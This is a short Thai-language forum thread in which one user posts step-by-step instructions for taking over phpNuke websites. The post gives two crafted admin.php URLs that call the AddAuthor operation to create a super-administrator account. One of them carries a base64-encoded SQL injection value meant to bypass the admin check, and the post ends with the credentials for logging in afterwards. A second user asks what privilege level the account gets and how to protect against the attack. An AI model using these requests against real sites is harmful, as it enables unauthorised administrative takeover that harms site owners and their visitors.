อันดับแรกเลยหาเว็บ phpNuke

[lovehamter]

อันดับแรกเลยหาเว็บ phpNuke
http://ชื่อเว็บ/admin.php
หาหน้า admin.php

ใส่คำสั่งต่อท้าย
CODEhttp://ชื่อเว็บ/admin.php?op=AddAuthor&add_aid=oung&add_name=God&add_pwd=8576&add_email=g@g.com&add_radminsuper=1

หรือไม่ได้ก็ลองนี้อีกคำสั่ง

CODEhttp://ชื่อเว็บ/admin.php?op=AddAuthor&add_aid=gitem&add_name=God&add_pwd=hacked&add_email=g@g.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox

ถ้าได้ผลมันจะวิ่งกลับมาที่หน้า admin.php เหมือนเดิม
เมื่อได้ผลเราก็แค่ login
user oung
pass 8576

[THENBA1]

ชื่อผู้ใช้ใน CODE นี้จะอยู่ในสถานะ MEMBER หรือ ADMIN ครับแล้วจะมีวิธีป้องกันรึเปล่าครับ เพิ่งรู้นะเนี่ยว่าทำแบบนี้ก็ได้ อยากได้ข้อมูลเพิ่มครับ